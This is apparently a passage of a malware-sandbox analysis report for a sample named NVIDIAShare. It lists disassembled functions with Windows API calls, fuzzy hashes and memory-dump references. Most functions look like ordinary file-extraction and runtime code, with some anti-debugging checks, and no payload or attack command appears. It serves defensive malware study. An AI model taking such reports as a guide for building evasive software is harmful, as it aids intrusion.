Opcode Fuzzy Hash: 2316f976ebd558bfefc6c5d2b13a5a581e081a47cfd271eab90a06eb3742c35e
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Function 0101E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c97073bf6442b9f95dfadd859d926e23a7cf7704775c3323a65807a1dd2b7686
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: c97073bf6442b9f95dfadd859d926e23a7cf7704775c3323a65807a1dd2b7686
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Function 01009F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0100903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 01009F0C

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: fdca6560b5ee393511718fac952f18a8c81882639aae0eee3b767886141d7c7f
Instruction ID: d7a11264a7f8f978e2f0d6a0396ae504948641953a674c100492c999eab91746
Opcode Fuzzy Hash: fdca6560b5ee393511718fac952f18a8c81882639aae0eee3b767886141d7c7f
Instruction Fuzzy Hash: 83A0243004400D47DD101730C71400C7710F7117C030001D47007CF051C71F4407CF00

Function 0101AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0101AE72,C:\Users\user\Desktop,00000000,0104946A,00000006), ref: 0101AC08

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 74b621d7e204367a8b53cc68256ab3adc079a597a2b0abbeb68be5432d713a69
Instruction ID: 5b9290ba93f63bd00ba45889395ca824d03d5855e80da6fa2305b001c5dde865
Opcode Fuzzy Hash: 74b621d7e204367a8b53cc68256ab3adc079a597a2b0abbeb68be5432d713a69
Instruction Fuzzy Hash: 7FA011302002008B82000A328B8AA0EBAAABFA2B20F00C028A08088020CB3AC820AA00

Function 01009620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,010095D6,?,?,?,?,?,01032641,000000FF), ref: 0100963B

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ef4ca47a0d06aa223ec60324e11d54b951d612392cf1208fd3d27fbb49532fb2
Instruction ID: b699d0f0767de549242a4d9c844c35bdcdb06aac75e9b6efa8171ecaf4f36f53
Opcode Fuzzy Hash: ef4ca47a0d06aa223ec60324e11d54b951d612392cf1208fd3d27fbb49532fb2
Instruction Fuzzy Hash: 54F089704C1B159FFB328A68C898792B7E86B16325F041B5ED0EA429E1D775618DCB40

Non-executed Functions

Function 0101C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0101C2B1
EndDialog.USER32(?,00000006), ref: 0101C2C4
GetDlgItem.USER32(?,0000006C), ref: 0101C2E0
SetFocus.USER32(00000000), ref: 0101C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0101C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0101C358
FindFirstFileW.KERNEL32(?,?), ref: 0101C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0101C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0101C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101C3D4
_swprintf.LIBCMT ref: 0101C404

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0101C417
FindClose.KERNEL32(00000000), ref: 0101C41E
_swprintf.LIBCMT ref: 0101C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 0101C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0101C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0101C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0101C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101C509
_swprintf.LIBCMT ref: 0101C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0101C548
_swprintf.LIBCMT ref: 0101C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0101C5AF

Part of subcall function 0101AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0101AF35
Part of subcall function 0101AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0103E72C,?,?), ref: 0101AF84

Strings

REPLACEFILEDLG, xrefs: 0101C247
%s %s %s, xrefs: 0101C3F2, 0101C527
%s %s, xrefs: 0101C469, 0101C58E

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: bec36f016cfc376905c8a3dd537652e2aaf7f8e0e551bc7764c43be41c67ce2e
Instruction ID: da0a8abd295e4b535dad5a26aebcaac267da91cb0451151e9f7264ebc25dd081
Opcode Fuzzy Hash: bec36f016cfc376905c8a3dd537652e2aaf7f8e0e551bc7764c43be41c67ce2e
Instruction Fuzzy Hash: ED917372148345BBE2319AA4DD49FFB7BECEB4A700F044819F7C9DA085D67AE6048762

Function 01006FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01006FAA
_wcslen.LIBCMT ref: 01007013
_wcslen.LIBCMT ref: 01007084

Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00

Part of subcall function 0100A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641,000000FF), ref: 0100A1F1
Part of subcall function 0100A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641), ref: 0100A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 01007139
CloseHandle.KERNEL32(00000000), ref: 01007155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 01007298

Part of subcall function 01009DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,010073BC,?,?,?,00000000), ref: 01009DBC
Part of subcall function 01009DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E70

Part of subcall function 01009620: CloseHandle.KERNELBASE(000000FF,?,?,010095D6,?,?,?,?,?,01032641,000000FF), ref: 0100963B

Part of subcall function 0100A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
Part of subcall function 0100A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532

Strings

UNC\, xrefs: 01007051
SeCreateSymbolicLinkPrivilege, xrefs: 01006FCC
SeRestorePrivilege, xrefs: 01006FC2
\??\, xrefs: 0100702B

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: bf2a26336e1b7b833c00df88e19a8063f102071af744a2875899634320f1289f
Instruction ID: d468226b18f36b42239ba321f75972b55fbf4c9e34f8fb9fc6045c98d0c20a36
Opcode Fuzzy Hash: bf2a26336e1b7b833c00df88e19a8063f102071af744a2875899634320f1289f
Instruction Fuzzy Hash: 58C1B2B1900645AAFB26DB78CC81BEEB7ACBF14300F00455AF9D6E71C1D779B6848B61

Function 0102D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0102DA34

Strings

1#SNAN, xrefs: 0102EC33
1#INF, xrefs: 0102EC41
1#QNAN, xrefs: 0102EC3A
1#IND, xrefs: 0102EC2C

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 245d211975a5d105f25307308636134d15ba307f3a7889432b04c623d2897bac
Instruction ID: 649a79ec5fab2f3b232b8cc015445a4b6726e495beb1da0414bcea7bfc4c180c
Opcode Fuzzy Hash: 245d211975a5d105f25307308636134d15ba307f3a7889432b04c623d2897bac
Instruction Fuzzy Hash: C1C24872E086298FDB65CE68DD407EAB7F5EB44304F1441EAD98DE7241E778AE818F40

Function 010032F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01003300
_swprintf.LIBCMT ref: 010036C7

Strings

CMT, xrefs: 01003A17
h%u, xrefs: 010036BC
hc%u, xrefs: 0100370A

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 9530ba0b819ecdbc3288300584fe743c857c2e7d3dc8f941f89c47d554ec5c1e
Instruction ID: d59c60b1e4a6152a39eefc46e876a1faced6b55a6543b2a301688526d96e63b7
Opcode Fuzzy Hash: 9530ba0b819ecdbc3288300584fe743c857c2e7d3dc8f941f89c47d554ec5c1e
Instruction Fuzzy Hash: 9D32A1715106859FFB1ADF74C894AEA3BA5BF15300F0845BDEDCA8F2C2DA74A549CB20

Function 0100286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01002874
_strlen.LIBCMT ref: 01002E3F

Part of subcall function 010102BA: __EH_prolog.LIBCMT ref: 010102BF

Part of subcall function 01011B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100BAE9,00000000,?,?,?,0001044E), ref: 01011BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01002F91

Strings

CMT, xrefs: 01002FBC

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 7cbd3f1beb7ac275f85b55c301550474d41f695897dc89aadfe2cb9bc5783be8
Instruction ID: 967554b208251902983a41a48b7a3b27df823c820547e3ec87fb14a6e3c9828b
Opcode Fuzzy Hash: 7cbd3f1beb7ac275f85b55c301550474d41f695897dc89aadfe2cb9bc5783be8
Instruction Fuzzy Hash: 6262E4715006458FFB1ADF38C8886EA3BA1BF64300F0845BEEDDA8B2C2DB759545CB60

Function 0101F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0101F844
IsDebuggerPresent.KERNEL32 ref: 0101F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0101F930
UnhandledExceptionFilter.KERNEL32(?), ref: 0101F93A

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 33dd3e55305a5d974c9f738476a5e3e022fad23c1ac7952bd56bb2e34ccf5dc3
Instruction ID: 7cc8686e5964e7804ef8269a00d8d5d85b81af89c99ca3cf040891ed4e38ce4b
Opcode Fuzzy Hash: 33dd3e55305a5d974c9f738476a5e3e022fad23c1ac7952bd56bb2e34ccf5dc3
Instruction Fuzzy Hash: 27312BB5D4521ADBDB21DFA4D9897CCBBF8BF04304F1040DAE44DAB254EB759A888F44

Function 0101E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,0101E5E8,0000001C,0101E7DD,00000000,?,?,?,?,?,?,?,0101E5E8,00000004,01061CEC,0101E86D), ref: 0101E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0101E5E8,00000004,01061CEC,0101E86D), ref: 0101E6CF

Strings

D, xrefs: 0101E6C3

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 5e4d1af27fe096fb9a7ffcc892af1d617e293605103f2521ccdce6260a2c90cb
Instruction ID: f5783f18896788a5adddb61eaed8e0b2581357fd7fceb785b3640053557cd7e8
Opcode Fuzzy Hash: 5e4d1af27fe096fb9a7ffcc892af1d617e293605103f2521ccdce6260a2c90cb
Instruction Fuzzy Hash: 2101D4326001096BEB24DE29DC49ADD7BEABFC4224F0CC160ED99DB148D638D9058680

Function 01028EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 01028FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 01028FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 01028FCC

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d2a9faca21dc5d88dba16d648ae44d1352ac8314d2b60a3a3aa5944c49cef278
Instruction ID: 35d191b160676e77ae8cfb2abf9217132951dd5ef155ac2260110fe556458fb0
Opcode Fuzzy Hash: d2a9faca21dc5d88dba16d648ae44d1352ac8314d2b60a3a3aa5944c49cef278
Instruction Fuzzy Hash: E031D675901229ABCB61DF28D888BDCBBF8BF08310F5041DAE85CA7250E7749B858F44

Function 0102B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0102B4DB

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 07fa4350fef49a05be5baf472a48f3d6712adb33a67d384f234fbe7827207036
Instruction ID: e31529c4bdba0a60fc9daeb7bd6e515bf03416724080e2a0c3a7b663ba50e44d
Opcode Fuzzy Hash: 07fa4350fef49a05be5baf472a48f3d6712adb33a67d384f234fbe7827207036
Instruction Fuzzy Hash: 28314671800269AFDB248E7CCC84EFB7BFDEF85314F0441E8E998D7241EA34AA448B50

Function 0102D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 826a7ec12831c9f14257fcae7966b07166a9ac6892a8aae26e6f4152fde86136
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: B3022D71E002299FDF14CFA9C8806ADBBF5FF48314F1581AAD959E7385D731AD418B90

Function 0101AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0101AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,0103E72C,?,?), ref: 0101AF84

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
